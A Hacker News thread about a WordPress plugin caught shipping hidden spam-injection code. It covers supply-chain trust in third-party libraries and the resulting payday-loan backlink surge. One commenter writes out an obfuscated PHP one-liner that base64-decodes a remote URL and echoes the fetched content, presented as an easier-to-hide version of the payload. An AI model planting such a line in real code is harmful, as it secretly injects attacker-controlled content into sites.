

WordPress Plugin Social Media Widget Hiding Spam - sucuri2
http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html

======
joshguthrie
For a "hidden" payload, it looks awfully complicated and long. This could've
been accomplished with a simple one-liner that would've been easier to hide:

    
    
        echo @file_get_contents(base64_decode("aHR0cDovL2kuYWF1ci5uZXQvaS5waHA="));
    

Plus it may have looked like "black magic" to someone not acquainted with
@-prefixed functions in PHP and base64 =)

> It’s the fact that the malicious payload found it’s way in the core files.
> It was then uploaded to the WordPress.org Plugin Repository.

I second this fear. Many of us would be quick to dismiss this issue (Call me
biased, but I don't see this gaining as much "traction" as the crisis we had
when RubyGems was compromised) because "PHP is bad and you should feel bad" or
"WordPress users can't code", but this is not "a repository is being hacked",
this is "a plugin with malicious code has been uploaded ready to be used".
This is exactly the same as a npm module handling payments gaining a 20-lines
payload sending critical infos to parts unknown when bumping from 1.0.1 to
1.0.2: a plugin developer pushed corrupt code to be used in production (though
there is nothing about it, I hope this happened without malice on this
person's behalf).

This makes me seriously wonder: how many of us ACTUALLY "dive" into the
libraries we use day-to-day in production apps? How many of us read every part
of these libraries when we don't need to understand/debug them?

The last time you used Boost Threads, did you read (and understood) their
source code? What about Express or Mongoose in your Node.js-powered E-commerce
web app? Or your RoR app using Mongoid?

Waiting for input, opinions, advices, best practices and the like.

------
trevin
Some sophisticated SEO link spam for 'pay day loans'

Out of curiosity, I looked up that particular pay day loan site's backlink
profile. They went from having zero websites linking to them to around 250,000
in the matter of a few hours. All of the links had anchor text with some
variation of 'payday loans' or 'payday loans UK'

Here's a screenshot of their backlink increase:
<http://i.imgur.com/Qo20DkL.png>

Doesn't look like they are ranking on page 1 yet for any of those terms, which
is good. Hopefully Google is on to them.

~~~
mpclark
What's the tool you used to get the backlink profile?

~~~
trevin
<https://ahrefs.com/>

------
rumble_king1
You can read the orignal plugin author's response here:
[http://wordpress.org/support/topic/plugin-social-media-
widge...](http://wordpress.org/support/topic/plugin-social-media-widget-php-
notice-undefined-index-pinterest-on-line-66)

------
pgrote
It has been removed from wordpress.org. The support page is working, though:

<http://wordpress.org/support/plugin/social-media-widget>

~~~
sucuri2
Yep. The WP.org guys explain the reason for removing it:

[http://wordpress.org/support/topic/anyone-know-why-social-
me...](http://wordpress.org/support/topic/anyone-know-why-social-media-widget-
was-removed)

